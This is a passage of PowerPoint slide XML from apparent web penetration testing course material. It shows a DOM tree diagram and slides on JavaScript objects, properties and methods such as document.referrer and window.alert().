              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:pPr indent="-342900" algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>Root:</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>&lt;html&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="158727" name="Rectangle 4"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="ltGray">
            <a:xfrm>
              <a:off x="4191000" y="4419600"/>
              <a:ext cx="914400" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:pPr indent="-342900" algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>Element:</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>&lt;body&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="158728" name="Rectangle 4"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="ltGray">
            <a:xfrm>
              <a:off x="914400" y="5105400"/>
              <a:ext cx="914400" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:pPr indent="-342900" algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>Element:</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>&lt;title&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="158729" name="Rectangle 4"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="ltGray">
            <a:xfrm>
              <a:off x="914400" y="4419600"/>
              <a:ext cx="914400" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:pPr indent="-342900" algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>Element:</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>&lt;head&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="158730" name="Rectangle 4"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="ltGray">
            <a:xfrm>
              <a:off x="914400" y="5791200"/>
              <a:ext cx="914400" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:pPr indent="-342900" algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>Text:</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>"PEWAPT101"</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="158731" name="Rectangle 4"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="ltGray">
            <a:xfrm>
              <a:off x="4191000" y="5105400"/>
              <a:ext cx="914400" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:pPr indent="-342900" algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>Element:</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>&lt;a&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="158732" name="Rectangle 4"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="ltGray">
            <a:xfrm>
              <a:off x="6019800" y="5105400"/>
              <a:ext cx="914400" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:pPr indent="-342900" algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>Element:</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>&lt;p&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="158733" name="Rectangle 4"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="ltGray">
            <a:xfrm>
              <a:off x="6019800" y="5791200"/>
              <a:ext cx="914400" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:pPr indent="-342900" algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>Text:</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>"Content"</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="158734" name="Rectangle 4"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="ltGray">
            <a:xfrm>
              <a:off x="4191000" y="5791200"/>
              <a:ext cx="914400" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:pPr indent="-342900" algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>Text:</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>"Home"</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="158735" name="Rectangle 4"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="ltGray">
            <a:xfrm>
              <a:off x="2286000" y="5105400"/>
              <a:ext cx="1524000" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:pPr indent="-342900" algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>Attribute:</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>"www.PEWAPT101.org"</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="158736" name="Elbow Connector 15"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="158726" idx="2"/>
              <a:endCxn id="158727" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="ltGray">
            <a:xfrm rot="5400000">
              <a:off x="4533900" y="4305300"/>
              <a:ext cx="228600" cy="1588"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>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58737" name="Elbow Connector 16"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="158731" idx="0"/>
              <a:endCxn id="158727" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="ltGray">
            <a:xfrm rot="5400000" flipH="1" flipV="1">
              <a:off x="4533900" y="4991100"/>
              <a:ext cx="228600" cy="1588"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>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58738" name="Elbow Connector 17"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="ltGray">
            <a:xfrm rot="5400000" flipH="1" flipV="1">
              <a:off x="4533900" y="5676900"/>
              <a:ext cx="228600" cy="1588"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>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58739" name="Elbow Connector 18"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="158735" idx="3"/>
              <a:endCxn id="158731" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="ltGray">
            <a:xfrm>
              <a:off x="3810000" y="5334000"/>
              <a:ext cx="381000" cy="1588"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>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58740" name="Elbow Connector 19"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="158727" idx="2"/>
              <a:endCxn id="158732" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="ltGray">
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="5448300" y="4076700"/>
              <a:ext cx="228600" cy="1828800"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>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58741" name="Elbow Connector 20"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="158726" idx="2"/>
              <a:endCxn id="158729" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="ltGray">
            <a:xfrm rot="5400000">
              <a:off x="2895600" y="2667000"/>
              <a:ext cx="228600" cy="3276600"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>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58742" name="Elbow Connector 21"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="158729" idx="2"/>
              <a:endCxn id="158728" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="ltGray">
            <a:xfrm rot="5400000">
              <a:off x="1257300" y="4991100"/>
              <a:ext cx="228600" cy="1588"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>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58743" name="Elbow Connector 22"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="158730" idx="0"/>
              <a:endCxn id="158728" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="ltGray">
            <a:xfrm rot="5400000" flipH="1" flipV="1">
              <a:off x="1257300" y="5676900"/>
              <a:ext cx="228600" cy="1588"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>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58744" name="Elbow Connector 23"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="158733" idx="0"/>
              <a:endCxn id="158732" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="ltGray">
            <a:xfrm rot="5400000" flipH="1" flipV="1">
              <a:off x="6362700" y="5676900"/>
              <a:ext cx="228600" cy="1588"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:extLst>
              <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
                <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                  <a:noFill/>
                </a14:hiddenFill>
              </a:ext>
            </a:extLst>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158724" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1584960"/>
            <a:ext cx="8686800" cy="1447800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The document is viewed as a tree</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The HTML tag is the root and has two children, HEAD and BODY</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Each item is a child from there</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1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="152400"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>JavaScript Object</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Methods and Properties</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="159747" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="304800" y="1600200"/>
            <a:ext cx="8534400" cy="4495800"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>JavaScript is an object-oriented programming language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Objects have to be initialized</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>var myString = new String();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Objects have properties and methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Properties are attributes of the object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Methods are actions performed on the object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Developers can create their own objects</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We will focus on the built-in objects here with some examples of properties and methods that are useful for penetration testers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>When referring to a property of an object, we use the format </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>object.property</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>document.referrer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Calling a method is similar, but also includes () with values determined by the method</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>window.alert("This pop-up shows a method, alert()");</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="159748" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="3505200"/>
            <a:ext cx="3810000" cy="190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lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100"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itle 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="335280" y="137160"/>
            <a:ext cx="8458200" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Objects and Their</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Associated Properties &amp; Methods</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160771" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="1600200"/>
            <a:ext cx="4724400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Object type: String</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Property: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>length </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>returns the size</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Method: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>split() </a:t>
            </a:r>
            <a:r>
